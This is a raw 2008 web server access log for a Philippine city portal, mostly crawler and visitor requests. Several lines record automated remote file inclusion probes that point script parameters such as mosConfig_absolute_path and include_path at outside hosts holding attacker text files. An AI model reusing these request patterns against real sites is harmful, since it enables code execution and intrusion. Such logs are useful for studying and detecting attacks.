66.249.73.51 - - [30/Oct/2008:05:31:50 -0700] "GET /listings/listing/results.php?letter=n&category_id=692 HTTP/1.1" 200 24387 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:31:56 -0700] "GET /listings/listing/results.php?category_id=693 HTTP/1.1" 200 26648 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:32:09 -0700] "GET /listings/listing/results.php?letter=g&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:32:16 -0700] "GET /listings/listing/results.php?letter=k&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:32:29 -0700] "GET /listings/listing/results.php?letter=p&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:32:42 -0700] "GET /listings/listing/results.php?letter=e&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
75.126.148.210 - - [30/Oct/2008:05:32:45 -0700] "GET / HTTP/1.0" 200 44270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:32:48 -0700] "GET /listings/listing/results.php?letter=no&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:33:04 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:33:04 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 824 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:33:04 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:33:08 -0700] "GET /listings/listing/results.php?letter=i&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
41.207.162.4 - - [30/Oct/2008:05:33:11 -0700] "GET /realestate/ HTTP/1.1" 200 19191 "http://www.google.com/search?hl=en&q=hotmail.com+email+Contact+of+Real+Estate+in+Philippines&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
41.207.162.4 - - [30/Oct/2008:05:33:12 -0700] "GET /style.css HTTP/1.1" 200 17050 "http://www.sancarloscity.org/realestate/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:33:15 -0700] "GET /listings/listing/results.php?letter=c&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:33:22 -0700] "GET /listings/listing/results.php?letter=z&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:33:39 -0700] "GET /logs/access_080928.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:09 -0700] "GET /listings/listing/results.php?letter=u&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:15 -0700] "GET /listings/listing/results.php?letter=q&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:34:26 -0700] "GET /listings/listing/results.php?letter=t&category_id=692 HTTP/1.1" 200 25073 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:34 -0700] "GET /listings/listing/results.php?category_id=694 HTTP/1.1" 200 26507 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:37 -0700] "GET /listings/listing/results.php?letter=j&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:34:38 -0700] "GET /listings/listing/results.php?letter=s&category_id=697 HTTP/1.1" 200 25088 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:42 -0700] "GET /listings/listing/results.php?category_id=734 HTTP/1.1" 200 24528 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:49 -0700] "GET /listings/listing/results.php?letter=f&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:34:56 -0700] "GET /listings/listing/results.php?letter=r&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:34:58 -0700] "GET /listings/listing/results.php?letter=r&category_id=698 HTTP/1.1" 200 25121 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:03 -0700] "GET /jodera2/posting.php?mode=reply&t=24070 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24070" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:03 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:06 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:07 -0700] "GET /jodera2/posting.php?mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6 HTTP/1.0" 200 50762 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:35:16 -0700] "GET /logs/access_080829.log//guestbook1//admin.php?include_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 781 "-" "libwww-perl/5.79" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:35:17 -0700] "GET /guestbook1//admin.php?include_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 757 "-" "libwww-perl/5.79" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:35:18 -0700] "GET /logs//guestbook1//admin.php?include_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.79" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:20 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24070&sid=cf2edfb76f01c7b1f76091502b0f12a6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:35:20 -0700] "GET /listings/listing/results.php?letter=i&category_id=739 HTTP/1.1" 200 25109 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
84.16.230.107 - - [30/Oct/2008:05:35:21 -0700] "GET /jodera2/viewtopic.php?p=29891 HTTP/1.0" 200 81517 "http://www.sancarloscity.org/viewtopic.php?p=29891#29891" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:35:28 -0700] "GET /listings/listing/results.php?letter=s&category_id=750 HTTP/1.1" 200 24207 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:35:40 -0700] "GET /listings/listing/results.php?category_id=759 HTTP/1.1" 200 31001 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:35:53 -0700] "GET /listings/members/ HTTP/1.1" 302 5 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:35:54 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:35:54 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:35:55 -0700] "GET /listings/members/login.php?destiny=/listings/members/index.php&query= HTTP/1.1" 200 4381 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:35:56 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:35:56 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
72.30.79.49 - - [30/Oct/2008:05:36:03 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:36:06 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=c1954c533eda16c91c981b1229c2a72b" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:05:36:07 -0700] "GET /jodera2/viewtopic.php?p=29892 HTTP/1.0" 200 31236 "http://www.sancarloscity.org/viewtopic.php?p=29892#29892" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:36:07 -0700] "GET /listings/listing/results.php?category_id=739 HTTP/1.1" 200 24160 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.30.79.49 - - [30/Oct/2008:05:36:12 -0700] "GET /qphotogallery/displayimage.php?album=topn&cat=-11&pos=6 HTTP/1.0" 200 22229 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:36:13 -0700] "GET /listings/listing/results.php?letter=t&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:36:17 -0700] "GET /listings/listing/results.php?letter=b&category_id=692 HTTP/1.1" 200 26661 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:36:24 -0700] "GET /listings/listing/results.php?letter=v&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:36:28 -0700] "GET /logs/access_080806.log//guestbook1//admin.php?include_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 781 "-" "libwww-perl/5.79" "www.sancarloscity.org"
82.102.10.26 - - [30/Oct/2008:05:36:32 -0700] "GET /logs/access_080921.log//?_SERVER[DOCUMENT_ROOT]=http://membres.lycos.fr/scannerid/id.txt??? HTTP/1.1" 404 760 "-" "libwww-perl/5.814" "www.sancarloscity.org"
82.102.10.26 - - [30/Oct/2008:05:36:32 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://membres.lycos.fr/scannerid/id.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.814" "www.sancarloscity.org"
82.102.10.26 - - [30/Oct/2008:05:36:33 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://membres.lycos.fr/scannerid/id.txt??? HTTP/1.1" 200 71310 "-" "libwww-perl/5.814" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:36:34 -0700] "GET /listings/listing/results.php?letter=m&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:36:38 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61703 "-" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:36:48 -0700] "GET /jodera2/viewforum.php?f=1&sid=dcac8fe529044a405c8cd0644357ea21 HTTP/1.0" 200 84750 "-" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:36:49 -0700] "GET /listings/listing/results.php?letter=o&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:36:59 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:37:01 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:02 -0700] "GET /listings/listing/results.php?category_id=751 HTTP/1.1" 200 37851 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:37:15 -0700] "GET /jodera2/index.php?sid=dcac8fe529044a405c8cd0644357ea21 HTTP/1.0" 200 55140 "-" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:37:15 -0700] "GET /jodera2/viewtopic.php?p=27756 HTTP/1.1" 200 76342 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:15 -0700] "GET /listings/listing/results.php?letter=x&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:37:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 765 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:37:17 -0700] "GET /logs/access_080927.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:37:17 -0700] "GET /jodera2/viewtopic.php?p=27215 HTTP/1.1" 200 41737 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:37:17 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 771 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:37:18 -0700] "GET /jodera2/viewtopic.php?p=27791&sid=0f89df8522bfdc751fb2c358555c1136 HTTP/1.1" 200 41597 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:37:20 -0700] "GET /jodera2/viewtopic.php?p=27789&sid=1f9addfbf892fba5f0b33db4fb19b8b2 HTTP/1.1" 200 76172 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:37:21 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41364 "-" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:21 -0700] "GET /listings/listing/results.php?letter=b&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:05:37:22 -0700] "GET /jodera2/viewtopic.php?p=27766&sid=8471b2481e8d41371bb9ccaa56c2f5f1 HTTP/1.1" 200 75922 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:26 -0700] "GET /listings/listing/results.php?category_id=747 HTTP/1.1" 200 26628 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
41.247.154.135 - - [30/Oct/2008:05:37:28 -0700] "GET /phpmyadmin/lang/afrikaans-iso-8859-1.inc.php HTTP/1.1" 200 5 "http://www.sancarloscity.org/.search?query=beter&hits=10&offset=10" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:37:29 -0700] "GET /logs/access_080724.log HTTP/1.0" 200 1041811 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:36 -0700] "GET /listings/listing/results.php?category_id=725 HTTP/1.1" 200 26615 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:37:36 -0700] "GET /logs/access_071204.log HTTP/1.0" 200 462831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:05:37:45 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11442 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Opera/9.00 (Windows NT 4.0; U; en)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:45 -0700] "GET /listings/listing/results.php?letter=l&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:37:50 -0700] "GET /listings/listing/results.php?letter=x&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:38:10 -0700] "GET /listings/promotion/ HTTP/1.1" 200 15950 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:38:18 -0700] "GET /listings/listing/results.php?letter=h&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:38:22 -0700] "GET /listings/listing/results.php?letter=d&category_id=750 HTTP/1.1" 200 25109 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:38:38 -0700] "GET /logs/access_081007.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/idih.txt%0D? HTTP/1.1" 404 789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sancarloscity.org"
82.99.30.43 - - [30/Oct/2008:05:38:40 -0700] "GET /jodera2/viewtopic.php?p=28059 HTTP/1.0" 200 33031 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:38:50 -0700] "GET /listings/listing/results.php?category_id=760 HTTP/1.1" 200 26186 "http://www.sancarloscity.org/listings/listing/results.php?category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:39:01 -0700] "GET /thumbnails.php?album=71 HTTP/1.1" 404 763 "http://www.sancarloscity.org/picgallery" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
